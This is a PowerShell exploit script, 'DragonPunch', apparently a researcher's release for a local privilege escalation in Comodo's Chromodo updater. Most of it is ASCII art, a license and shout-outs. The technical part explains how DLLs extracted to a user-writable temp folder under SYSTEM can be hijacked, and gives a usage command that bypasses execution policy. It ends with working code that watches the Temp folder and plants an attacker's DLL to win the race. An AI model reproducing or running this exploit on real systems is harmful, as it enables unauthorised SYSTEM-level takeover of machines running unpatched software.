#DragonPunch Comodo LPE Exploit by @Laughing_Mantis

<#

  ██████╗ ██████╗  █████╗  ██████╗  ██████╗ ███╗   ██╗    ██████╗ ██╗   ██╗███╗   ██╗ ██████╗██╗  ██╗  ██╗
  ██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗  ██║    ██╔══██╗██║   ██║████╗  ██║██╔════╝██║  ██║  ██║
  ██║  ██║██████╔╝███████║██║  ███╗██║   ██║██╔██╗ ██║    ██████╔╝██║   ██║██╔██╗ ██║██║     ███████║  ██║
  ██║  ██║██╔══██╗██╔══██║██║   ██║██║   ██║██║╚██╗██║    ██╔═══╝ ██║   ██║██║╚██╗██║██║     ██╔══██║  ╚═╝
  ██████╔╝██║  ██║██║  ██║╚██████╔╝╚██████╔╝██║ ╚████║    ██║     ╚██████╔╝██║ ╚████║╚██████╗██║  ██║  ██╗
  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═══╝    ╚═╝      ╚═════╝ ╚═╝  ╚═══╝ ╚═════╝╚═╝  ╚═╝  ╚═╝


                      .-:/+oossoo++:-.
                  `-/ossyyhhhhddddddddddy+-`                                `.-:-..`
                -+ossyyhhhdddmmmmNNNNNNNmmmdo-                      ``-:+oyhddhys+osyyso+/:-``
             `:oossyyhhddddhysoooooosydNMNNNmmh/`              -oyddddysso+//++oy++//://+ooyhhhhyo-
            :oossyyhhdhs/-..---::----...-+yNNNmmh:            `mm+ooossssssssssss++++++++///::::/dd.
          `+oosyyhhho-..-:///++++/oshmy::-..+dNmmdo`          -Ny+dyssssssssssoos++++++++///////-yd-
          .oossyyhh+..-://++++oyhdNNNNNd-o+/:--ommmdy.         -my/hssssssssssssssoooo+++++++////-yh-
         .oossyhho.`-:///+shmNMMNNNNNNNo-yhs+///+dmddy`        -my/yssssssyyyyhhhyyysssssooo+/::--o/-
         +oosyyy+``-:+oydmNMMMMMNNNNNmo-:dNmhs/+++dddho        -dy/sooossyhdhddddmmmmddddddo+::---o:-
        :+osyyy+``:oyhhdmmNNMMMMNNds/--:oMMMNds/oosddhy-       -dy/ooosyydhmMMMMMMMNNNNNmds+:::---s/-
        ++osyyo:`/ssyhhddmmNNdyo/---::/sNMMMNmy+osshhhy+       -hy/ooosyhhMMMMNhyoo+++++++/:::::--s+-
        o+osyo+:+ossyyhhhs+-..---::-:odNNNNNNdyo/yyyhyyo       -ys:++osysMMMMMso//:::::::::::::::-yo-
        ++oss++oooosss+-`...-:--.` /mNNNNNNmmdy+/yhhyyso       .ys:++o+shMMMMdo///:::::::::::::::-yy-
        +/+oo++++ooo/....-:-:/y+   +mmmmmmddhyo/+hhhyss+       `ss-////omMMMMyo/////////::::::::::yh`
        ///+o//++++-..--/-:syhdd. `ymddddhhyyo+:yhhhsso:       `sy-:://+NMMMMyo//+//////////:::::/hd
        .///+///++:---:+-:oosyyh/ :hhhhyyysso/:odddyoo+`       .dd-:::/ohMMMMNhysyssssssyys//:::+/hd
         :////////-:::/+-:/+oosy+.yysssssoo/:-odddhoo+:         yN:-:::/ohNMMMMMMMMMMMMMNyo//::/s+Nh`
          :///////:////o--////+o:oooooo++/:--ydddho++:          -mh-:::::/+syhdddmdddddhs+//::/sohN:
           :::::////+++os--:///++++////:-.-sdddmy+++:            :my---:::::::///s+++++/////:/oohN+
            .::::://ooossyo:..------...:+ymdmmho++/.              -hh/-----------+/////////:/+odm:
             `-:::::/osyyyyhys++//++syddddmdho+//-`                `+hy:---------///////:://ohms`
               `-:::::/oyyhhhhhhddddddddhyo////-`                    .+hy+-------/:::::::/ohho.
                  .-:::::/osyyhhhhhyso+////:-`                         `:oys+:---/::::/osys:`
                     `.--:::::::::::::::-.`                               `:+sso++:+ooo+:`
                           ```````.``                                        `.:+o+:-.``
                                                   `..-.
                                                `.//+hs++.
                                              `:-:+yh+osh-
                                              .sssyyo:-::::
                                               .oddsoho/.:+`
                                                :sdyo/osshh`
                                                 `:ohsyhdmh:.
                                                   /MMMMNmmN/
                                                   /MMMMmmdm/
                                                   -ydmNNmh+--`
                                                    `yyoys+-..--
                                                     ys+y+--...--`
                                                     s+:o/-....-/.
                                                     o+:+/:---..:.
                                                     :/++++:--../.
                                                      .y+oy/:---o.
                                          `:sssssso../oyoos/--:+y.
                                         `hmmdhhhhyyhmmdho/-..:+y.
                                        /hNmddhyddyddmNMNs--...-s.
                                        oMMNmddhNNmNMMNdMh:-....+.
                                        /hNMMNmdNNdmmmmdhyo:--..+.
                                         `ymmdhhhhhssdhy///-..:+o.
                                         `sdmdhdmmd::dyo:-.--::/y.
                                           /Nhhyood+/syy+:-.`.:/y.
                                          `odoyyo+y+:`/y+++/-.`.o.
                                       `-//yd:oy:.-.-o:```.//.``/.
                                     ../+sdddoyy////+s:`   -:.` +.
                     -/---:`   ` `---:-..:d+:-oy-.``.so/`  ..`  /.
                   `-::.sh:..:-.://+++:` `/.  .:`   `:oy`  ..  `o.
                   .o:+ddds:-hho/:-:/sss:.           `+y`  .. `.y.
                  `-ymNMNd::/ys:.``..-:ohs.` ````   ``+y```.` `-y.
                   .hNMMNNsdmho:-.....-:yo.````.`  ``.oy```.` -/o`
                    `sNmhdNMNyso/:---:/+yo-.`...`  ...oy```.` /+`
                     oMNmNNds:/+++://+osys/--..`  `.-.oy```.` /+
                     +h/yyo/-..-///:/+++hy+:..`  `..--oy```.` /+
                     /o.os-....-//-+s++shy/.````.-:--+sy--:``./:
                     /+.os:----///-sdyhho:.``..-/:.-:yhy+:.`.o.
                     /o-+oo/-//::/ssyhyo/:-::://:-`/ydyo:.`/++.`
                     /o:-.---//+s+/``:////:///:.`.:ydyo:.:ody`+y:`
                     .:+:--:/+:--`    .hsoo/:..`-/hhs//+shmh+ +h+/:
                       `-/:.``       /oy++hyyhhhmmNmmddmdy+.`./+..-..
                                     ss-:::::+++ooooo+/:``.---/o-.``````
                                     s+```.--:::-.``````.-:..`+y--.`` ``.``
                                     so.```   `.--:-..`.-.``.:sh+:-...````..`
                                     odyo+/-.```  ```.```.-+shhhysssoo:..``-:/
                                    .ohsyhhhhyso//:::/+oyhdddhhyyssso+osy:``:s`
                                   -dho----:/oyhhdmmmmmmdddso////-.://oo/-.:+o
                                   -d+-``````-:+syhdmmmdyo+-.``..--..`.--/+/.
                                   -d-.```````.-/ohddds++oso/.``````..::+o+
                                   -d:.````````-/ohys+++-..os+.````...///`
                                   -ds+:---.``.-/sds+:/+-../oy:`....-/-.
                                  `:h+:.``````.-+sds+//+---+sd/....///
                                  hyo://::.`  `-shdhs+/:--:sdd+.`-/:`
                                  hdho/-.....``.yhhso++/.-+hmd+-o++
                                  hyo:-::::--:::hdy+/://.:sooso/:`
                                .+yo/:.````..:+yddy+::::..`-++.`
                                /dy/.```     .+hddyso++/-.
                                /do:.```     `-oddysoys+-`
                                /ho/-..```````-/ho//oys/:`
                                /dyyo/-..```...-y- `...`
                                /dho/-.``  ``..-s-
                                /dh:.`-++++:-``.s-
                                /dh/:osysyhhh-.`s-
                                .:hyys+//+yhhh/.o.
                                  +oy+//::/+omy/`
                                   -y+:-----:h/-
                                   -y////++/-.
                                   -yso+++++:
                                   -yys++++.`
                                  .-so++///`
                                  o+///:-:/`
                                  s/-::---:`
                                  s/://:::/`
                                  //+++++/:`
                                   `-----`


             ██████╗ ██████╗ ███╗   ███╗ ██████╗ ██████╗  ██████╗      █████╗ ██╗   ██╗
            ██╔════╝██╔═══██╗████╗ ████║██╔═══██╗██╔══██╗██╔═══██╗    ██╔══██╗██║   ██║
            ██║     ██║   ██║██╔████╔██║██║   ██║██║  ██║██║   ██║    ███████║██║   ██║
            ██║     ██║   ██║██║╚██╔╝██║██║   ██║██║  ██║██║   ██║    ██╔══██║╚██╗ ██╔╝
            ╚██████╗╚██████╔╝██║ ╚═╝ ██║╚██████╔╝██████╔╝╚██████╔╝    ██║  ██║ ╚████╔╝
             ╚═════╝ ╚═════╝ ╚═╝     ╚═╝ ╚═════╝ ╚═════╝  ╚═════╝     ╚═╝  ╚═╝  ╚═══╝

          ██╗     ██████╗ ███████╗    ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
          ██║     ██╔══██╗██╔════╝    ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
          ██║     ██████╔╝█████╗      █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
          ██║     ██╔═══╝ ██╔══╝      ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
          ███████╗██║     ███████╗    ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
          ╚══════╝╚═╝     ╚══════╝    ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝

                                      ██████╗ ██╗   ██╗
                                      ██╔══██╗╚██╗ ██╔╝
                                      ██████╔╝ ╚████╔╝
                                      ██╔══██╗  ╚██╔╝
                                      ██████╔╝   ██║
                                      ╚═════╝    ╚═╝

                ██╗      █████╗ ██╗   ██╗ ██████╗ ██╗  ██╗██╗███╗   ██╗ ██████╗
                ██║     ██╔══██╗██║   ██║██╔════╝ ██║  ██║██║████╗  ██║██╔════╝
                ██║     ███████║██║   ██║██║  ███╗███████║██║██╔██╗ ██║██║  ███╗
                ██║     ██╔══██║██║   ██║██║   ██║██╔══██║██║██║╚██╗██║██║   ██║
                ███████╗██║  ██║╚██████╔╝╚██████╔╝██║  ██║██║██║ ╚████║╚██████╔╝
                ╚══════╝╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝ ╚═════╝

                     ███╗   ███╗ █████╗ ███╗   ██╗████████╗██╗███████╗
                     ████╗ ████║██╔══██╗████╗  ██║╚══██╔══╝██║██╔════╝
                     ██╔████╔██║███████║██╔██╗ ██║   ██║   ██║███████╗
                     ██║╚██╔╝██║██╔══██║██║╚██╗██║   ██║   ██║╚════██║
                     ██║ ╚═╝ ██║██║  ██║██║ ╚████║   ██║   ██║███████║
                     ╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝╚══════╝


                                  `-:/+osyyhhhhhhyyso+/:.`
                            `-/oyhhyso+/:--.....--::/+osyhhyo/-`
                        .:ohhyo/-``      `   `.+. `      `.:+syhy+:`
                     -+yhs+-`    .``++--yy/  hod-syy.:+/`:/`   `:oyhs/.
                  .+yhs:`  .+::`yoh-oso-doo  hod-d+y.ssh.h/   -`  `./shs/`
               `:shs/``  :s.ysy++yy+-++`-:.  ... -:..+o/+s`/-osy+/`  `.+yho-
             `/yho-` `s/ `oy-y+o...`.-:/+oossssssoo+/:-```  /ossss-o-.  `:shs-
            :yho.  `://so` //``.:oyhhhddddddddddddddddhhys/-.`-:o/yoy//o`  -sds.
          .sdo.    -ysy/+- `-+yhddddddddd0days0daysyhdddddddhs/-`./s/os//:`  -yh+`
         /hy:  `:+. .o+- -+yhddddddd/-.```+y   odd:``.:/o+:ddddhy/.`-+/syy:`  `/hy-
       `sdo`  .-yh+o  `:sdddydddddds+`    :y:./osd.     `+-hdddhhdho- :o+:+so   .yd/
      .yd/  `+so+o+- :yddddyddddoyyho     +ds-/``s`    ``sh+/yddyhddho. .ss/-    `odo`
     .hh:  `-+sso: .sddddhshdddh-yhhh-````sdy`.+o+-   -yyydds-hddshdddh+`..`  .:/  +ds`
    .hh-  `ssso:- :hddddo-yddhy+/yhhdhhhho+++--+:./syyyysyyhh+oddh:yddddy.  :oo+-   +ds`
   `yd:    -+os.`+ddddy- /ds+oyhddddddddd+/ssoooo/sdddy--:::-/+yhd/`/hdddh: -.`.:o-  od+
   od+  `+:--` `odddds`  /syhdddhhyhhddhhhhhhhhhhddddds--/+o++++oys  -hdddd: `oo+//: `yd:
  -dy`  -sooy. +ddddy`  .ydddddddhysooy/..-+oooosyyyhsshhysssydhyy-   .ydddd- -ossy+  .dh`
  yd-  -os+o. :dddddhs+`oddddddhhs//yhso+:         `+hdhossyhhddddo`   .hdddh. /oo+:`  od+
 -dy   :++ss `hddddddd+ydddddo-.`   `odh:`         oddhhh+/::+yddddy+/+/ydddds/+yhdhs//odh+//-.`
 od/  `osoo. /dddddddddddddds`        +dh.`       /ddh..`     `sdddddddddddddddddddddddddddddddy/`
 yd.  -shhs` ohhhhhhhydddddh`         `sdss+````/`/dds         .ddddddhhhhhhhhhhhhhhhhhhhhhhhddddh:
`hh`  .::::  ````` ` `ddddd:           -dddyhddsh.-hds          sddddo                      `:ydddd:
.dh  ://:/- .hhhh+    hdddy            `dddddddhd:/hdh`         /dddds                        `hdddy
.dh  ---::- .dddd+    oddds            odddddddsdh+dddo         +dddd/                         hdddh
`dh` -://+/ `dddds    -dddd.         `oddddddddyhdsoddds.      :ddddy`                       .sdddd/
 hd. -oyssy` ydddh`   :dyhddo/---.-:+dddddddddddydds+ddddysooshddddho    .ooooooooooooooooosyddddd+
 sd:  `/++o. +dddd:   :dh//yddddddddddddddddddddh/hdh+sdddddddddddyy+    odddddddddddddddddddddds-
 :ds   ssss/ `ddddy`  -ddsy/-+syyyhyydddddhdddddd-.hddyosyhddddddddo`   .ddddhssyhddyssyddsso+:`
 `hd.  .:+/o- /ddddo  `hdy+dhyssssshdddddhsddddddo./dddyhys+ohddddh`   `ydddd. +oo+-`  +do
  /ds   oyys+` sdddd/`/ddd/sdddddddddddddyddddddddh+hdy-+shddddhsdh+:``sdddd/ `+ssy/  `hd.
   sd:  `//os: `yddddyddddh-hddddddddddhyyhhhyyoo/-`/o+dddddddhodyyddosdddd+ .yso+.   od/
   .hh. `+++/o+``sdddhhddddy/hddddddddssossss++///o+/o+/hddddhoddyydyhdddd+.:/oss+`  /ds`
    -dy.  .yyso```+ddddhhdddh+sddddddo`/yddddddddhyoydds-dddd/hddy+dddddh: oyyso-`  :dy`
     :dy.  ./+/s+. :ydddhyddddo/ydddd.:hdddddddddh-`:hdh/dddy/dddyhdddds. :o+oso`  :hy.
      :hh-  `o/+sso:`+hddhyhdddhooddy.hdddddddddd+ sdddddddd+hdhhydddy:``/ssss/`  /dy.
       -yh/   :yss:`.`.+hdddyddddyddh/dhydddddddd/`dddddddd+ydyhdddy:` .os++o:- `odo`
        `ods.  .-``+ss: `/shdydddd+dddddsddhhyhddo`oddddddh/sdhyyo-``+++yddy.  -yh/`
          :yh/`  -syso- :.`./yddddssdddh/o////osyyyyyyohddsydddd-..+yyddddddhs+hs-
           `+hy:``.-/.`os. :-ohdddds/oso:-:///++/:--/ssoohddddy+oyssdddshdddds+y.
             .ohy/` .-s+`  .yoo+dddyo/.``ohddddddds`  -syhydh/+shdddhhdydddy+oyd+
               .+hy+-`.    +ss-ysdys.   `hddddddddh``  `+dddshd+sddo:hddhhoss+:ho
                 `:shy/.`  .-.-yyhs`/sss++ys++++ss/oss/` odddh/sdd/-hdysdh++yd:d:
                    ./shy+-.`  `:h./ddddds+yhdhys::hddds`.ddh/ydd+/hdoydh:/hdy/y`
                       .:oyyso/--y oddddy+ddhhhoydoodddd: yshhdd/sdh+hdy-/+ys:+-
                           .:+shss +dddds+ddsdy+ydsodddd- s:hdd++dh/yds:++y:+:/
                                `y-.ddddd++yhdddhy/hddd+ -s`hdh-ddoo/s//sh:+-/
                                 -y.:yhhy//ooossyhs://. .s..dd/oddo+++o+h:/-:
                                  -y-    odddddddddo   -s. `hd.ddy+`/shdh//.
                                   .so.  -+oyyyyo+:` .o+`   oh-dds+++ods/:`
                                     -os/-`      `./oo.      .`ydoo:+ -/.
                                        -/+ooooooo/-`           ``:++:-
            `.
            -m:
            /MN+`
            oMmNs.
            yM+yNh:.`
            hM+/omm+--`
            hM+///hNh/--.`
            sMo////odNs::--.``
            :Mh//////smms/:----.```
             hNo///////sdmy+:--::----....````               ``````````
             .Nm/////////ohmds/:--:::::::-----.`   ``...-----------:--
              /Mh//////////+shmmyo+:::-:----.``..-----::-:::::::::::--
               sNy////////////+oyhdmdy+/-.``.--::-::::::::::::::::::--
               `sNy////////////////+oydmd+/::::::::::::::::::::::::::-
                `oNh+//////////////////+shmmy+::--:::::::::::::::::::-
                  :dms////////////////////+ohmdo:--:::::::::::::::::--
                   `omdo/////////////////////+smms/-::::::::::::::::--
                     .odds+/////////////////////smms:--::::::::::::::-
                       ./hmhs+////////////////////smd+:::::::::::::::-
                         `-+hddyo+/////////////////+dNy:-:::::::::::--
                             .:smNmhso+//////////////sNd/::::::::::::-
                               -md/+hMmdhs+///////////oNm/--:::::::::-
                              .md. -dmyyhmmdho+////////oNm/:::::::::--
                              yN- .mmsoooosdMMmho+//////oNd:::::::::--
                             .Nh  sMyoooosmMMmddmmho/////yMy:::::::::-
                             :Mo  dNooooohMMmyssyhMNds+///dM+--::::::-
                             -Ms  hNsooooyMMNyyyyhMMNmmy+/oMd:-:::::--
                             `mm` /MhooooohNMNNmNMMmssymmy+mM/-:::::--
                              +Mo  yNyoooooshdmmmdyooooohNmmMs-:::::--
                               yN/ `oNdsoooooooooooooooymysNMd:::::::-
                               `sNs` -ymdysoooooooosshdd+``+hm:::::::-
                                 :dd+. .+hdddhhhhhddds:``-yd:+/::::::-
                                  `/hdy/.``.:////:-.``-ohms-`--::::::-
                                     -+hmhyo+/:::/+sydds:`    ---::::-
                                        `-:+ossyss+/:.         ---:::-
                                                                .-----
                                                                 .----
                                                                  .-:-
                                                                   .--
                                                                    .-
                                                CYBERPOINT SRT       `


 * -----------------------------------------------------------------------------
 * "THE BEER-WARE LICENSE" (Revision 29A):
 * @Laughing_Mantis wrote this file.  As long as you retain credit and include
 * at the least 1 ASCII art design you can do whatever you want with this stuff.
 * If we meet some day, and you think this stuff is worth it, you can buy me a
 * preferably non-roofied drink in return.
 *                                                              @Laughing_Mantis
 * -----------------------------------------------------------------------------

██╗███╗   ██╗████████╗██████╗  ██████╗ ██████╗ ██╗   ██╗ ██████╗████████╗██╗ ██████╗ ███╗   ██╗
██║████╗  ██║╚══██╔══╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║██╔════╝╚══██╔══╝██║██╔═══██╗████╗  ██║
██║██╔██╗ ██║   ██║   ██████╔╝██║   ██║██║  ██║██║   ██║██║        ██║   ██║██║   ██║██╔██╗ ██║
██║██║╚██╗██║   ██║   ██╔══██╗██║   ██║██║  ██║██║   ██║██║        ██║   ██║██║   ██║██║╚██╗██║
██║██║ ╚████║   ██║   ██║  ██║╚██████╔╝██████╔╝╚██████╔╝╚██████╗   ██║   ██║╚██████╔╝██║ ╚████║
╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝ ╚═════╝ ╚═════╝  ╚═════╝  ╚═════╝   ╚═╝   ╚═╝ ╚═════╝ ╚═╝  ╚═══╝


Recommended For Your Listening Pleasure For This Text Only Release:
https://www.youtube.com/watch?v=Iof5pRAIZmw

Discovered this vulnerability in about 30 minutes using ProcMon + ProcExplorer
Comodo took 152 Days to Fix

Again since this is an early 2000's style vulnerability - why not treat it like one?
30 minute discovery time
1 hour 15 minute analysis and write up time
3 hour ASCII art design


 ██████╗ ██████╗ ███████╗███████╗████████╗███████╗
██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
██║  ███╗██████╔╝█████╗  █████╗     ██║     ███╔╝
██║   ██║██╔══██╗██╔══╝  ██╔══╝     ██║    ███╔╝
╚██████╔╝██║  ██║███████╗███████╗   ██║   ███████╗
 ╚═════╝ ╚═╝  ╚═╝╚══════╝╚══════╝   ╚═╝   ╚══════╝

CyberPoint SRT Team & @tacticalRCE - Cheers and thanks for the fish

@SecuriTay Yous da best Tay tay

@SecurityBeard Lets make the next Blackout Crew

@Scanlime RESPECT to everything you do

@qwertyoruiop is def the trump of jailbreak - hows that wall going?

@TravisGoodspeed Thanks for your blessing - POC||GTFO is so rad and such an inspiration

@Sc00terSec HOW MUCH IS DA PHISH?! CYBER! CYBER!

@Threatbutt #ThreatbuttMarketingTeamForLife!

@badd1e Awesome is indeed timeless - hope you are well

@Tferris has the best flash fuzzing files ever

@DA_667 SUPER LEGIT THOUGHT LEADER

@K4dl & @bonovoxly FASTER! HARDER! SCOOTER! https://www.youtube.com/watch?v=7aRbQKUJPA8

Team Cyberpathogen FTW

Fei Long Players are legit - RESPECT to you esp if you drive a VDub

Vectra Threat Research - REDI ROOM?!

NUKE & SLAM brothers and sisters you are missed


███████╗████████╗ █████╗ ██╗   ██╗████████╗██╗   ██╗███╗   ██╗███████╗██████╗
██╔════╝╚══██╔══╝██╔══██╗╚██╗ ██╔╝╚══██╔══╝██║   ██║████╗  ██║██╔════╝██╔══██╗
███████╗   ██║   ███████║ ╚████╔╝    ██║   ██║   ██║██╔██╗ ██║█████╗  ██║  ██║
╚════██║   ██║   ██╔══██║  ╚██╔╝     ██║   ██║   ██║██║╚██╗██║██╔══╝  ██║  ██║
███████║   ██║   ██║  ██║   ██║      ██║   ╚██████╔╝██║ ╚████║███████╗██████╔╝
╚══════╝   ╚═╝   ╚═╝  ╚═╝   ╚═╝      ╚═╝    ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═════╝

#Infosec community I am happy to give back to all of you and for that I
will be announcing something very special in the near future that will
be featuring a lot of really rad people that I respect in the community.

Expect Ascii Art, Code, Lolz, and maybe some one will drop the bass


████████╗███████╗ ██████╗██╗  ██╗██████╗ ███████╗████████╗ █████╗ ██╗██╗     ███████╗
╚══██╔══╝██╔════╝██╔════╝██║  ██║██╔══██╗██╔════╝╚══██╔══╝██╔══██╗██║██║     ██╔════╝
   ██║   █████╗  ██║     ███████║██║  ██║█████╗     ██║   ███████║██║██║     ███████╗
   ██║   ██╔══╝  ██║     ██╔══██║██║  ██║██╔══╝     ██║   ██╔══██║██║██║     ╚════██║
   ██║   ███████╗╚██████╗██║  ██║██████╔╝███████╗   ██║   ██║  ██║██║███████╗███████║
   ╚═╝   ╚══════╝ ╚═════╝╚═╝  ╚═╝╚═════╝ ╚══════╝   ╚═╝   ╚═╝  ╚═╝╚═╝╚══════╝╚══════╝

Updates for Comodo's browser, Chromodo, are performed automatically or whenever a user launches the browser
and goes to the "About Chromodo" option and selects update browser.

Chromodo Updates are downloaded and stored in the insecure folder C:\Users\<USER>\AppData\Local\Temp\NSX###.TMP
path (where as # represent a random number and X is a random letter).   This folder by default has writeable
permissions by the currently logged in user.

C:\Users\User\AppData\Local\Temp NT AUTHORITY\SYSTEM:(OI)(CI)F
                                 BUILTIN\Administrators:(OI)(CI)F
                                 DESKTOP-PRABIAQ\User:(OI)(CI)F

Updates are initially checked by the SYSTEM service C:\Program Files (x86)\Comodo\Chromodo\chromodo_updater.exe.
This service is auto executed on system start by the registry key - HKLM\System\CurrentControlSet\Services\ChromodoUpdater.

After this binary determines a update is available it will download and copy the update, as well as
chromodo_setup.exe, to the C:\Windows\Temp\ folder.  This binary is then executed with SYSTEM level privileges
with the command line "C:\Windows\temp\chromodo_setup.exe --silent".  However the current directory and the
other components of the update are both set to C:\Users\User\AppData\Local\Temp\nsX###.tmp folder.

Upon updating, the Chromodo_Setup.exe will create this temp nsX###.tmp folder and begin file extraction
from \Windows\Temp\ to this folder.

During this time the following DLL files are extracted to the insecure User's Temp folder and can be hijacked:
- System.dll
- DragonPlugin.dll
- SecureDNSPlugin.dll
- InstallHelperPlugin.dll
- AccessControlW.dll
- NsJSON.dll

A local attacker can then create an application to monitor the C:\Users\User\AppData\Local\Temp\ folder
for any creation of the temp folders.  When an update is available, the application can then beat the
race condition and then plant a malicious DLL in the folder before the legitimate DLL is copied.
These DLL files are then loaded at SYSTEM level privileges into Chromodo_Update.exe, however after gaining
elevated privileges the malicious attacker should migrate to a new process, write another file, or stay
persistent so the application can install the legit DLL in order to prevent a failed Chromodo update.


██╗   ██╗███████╗ █████╗  ██████╗ ███████╗
██║   ██║██╔════╝██╔══██╗██╔════╝ ██╔════╝
██║   ██║███████╗███████║██║  ███╗█████╗
██║   ██║╚════██║██╔══██║██║   ██║██╔══╝
╚██████╔╝███████║██║  ██║╚██████╔╝███████╗
 ╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝


DragonPunch.ps1 will monitor the User's AppData Local Temp folder for any creation of files.
Upon discoverying a newly added file or folder the exploit will drop the specified DLL in
the modified folder as "DragonPlugin.dll" (by default).

Exploitation should be achieved by running this exploit and then launch Comodo's browser, Chromodo, which comes
by default with Comodo CIS.  The local attacker should then go to the "About Chromodo" option and selects update
browser to trigger the race condition and LPE.

Example Usage
Powershell -ExecutionPolicy Bypass -File DragonPunch.ps1 -DLL C:\Exploitz\DLLHijacker.dll

-File should be your own DLL file that you are attempting to hijack DragonPlugin.dll with.
Bonus Points for DLL that includes GuileTheme.mid as a resource and plays it upon exploitation

███████╗██████╗ ██╗      ██████╗ ██╗████████╗███████╗
██╔════╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝╚══███╔╝
███████╗██████╔╝██║     ██║   ██║██║   ██║     ███╔╝
╚════██║██╔═══╝ ██║     ██║   ██║██║   ██║    ███╔╝
███████║██║     ███████╗╚██████╔╝██║   ██║   ███████╗
╚══════╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝   ╚══════╝

#>

Param
(

    [Parameter(ValueFromPipelineByPropertyName = $true)]
    [string]$DLL = ""
)

$Target = "DragonPlugin.dll"
<#
ALSO VULNERABLE:
- System.dll
- SecureDNSPlugin.dll
- InstallHelperPlugin.dll
- AccessControlW.dll
- NsJSON.dll
#>

$Interval = 1500
# Change the interval here if exploit race-condition is not being defeated
# (Win 7 x64 VM w/ 8GB RAM tested @ 1500ms)
# System.dll is usually the first written and needs approx 500ms or less


if (!(Test-Path $DLL))
{
    throw "Error: $DLL does not exist."
}

$Path="$Env:USERPROFILE\AppData\Local\Temp\"

if (!(Test-Path $Path))
{
    throw "Error: $Path does not exist."
}

[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")

$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon

$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Monitoring the Folder: $Path to drop: $Target"
$objNotifyIcon.BalloonTipTitle = "Dragon Punch Exploit by @Laughing_Mantis"

$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)


$GetFileList = {Get-ChildItem  -LiteralPath $Path -Filter * -Recurse -Force}

Write-Host "Getting initial list of files at $Path" -ForegroundColor Green
$OldFileList = @(. $GetFileList)
do
{
    $NewFileSet = @(. $GetFileList)
    Compare-Object -ReferenceObject $OldFileList -DifferenceObject $NewFileSet -Property Name, CreationTime -PassThru |
        Where-Object { $_.SideIndicator -eq '=>' } |
            ForEach-Object {
                if (Test-Path $_.FullName -PathType Container)
                {
                    $Victim = $_.FullName + "\"
                    Write-Host "Detected new folder: $Victim" -ForegroundColor Red
                    Copy-Item $DLL $($Victim + "\" + $Target) -Force
                    Write-Host "Dropped $Target @ $Victim" -ForegroundColor Red
                }
                else
                {
                    $Victim = Split-Path $_.FullName -Leaf
                    if (!($Victim.Equals($Target)))
                    {
                        $Victim = Split-Path $_.FullName -Parent
                        Write-Host "Detected new file: $($_.FullName)" -ForegroundColor Red
                        Copy-Item $DLL $($Victim + "\" + $Target) -Force
                        Write-Host "Dropped $Target @ $Victim" -ForegroundColor Red
                    }
                }
            }

    $OldFileList = $NewFileSet
    Start-Sleep -MilliSeconds $Interval

}
while($true)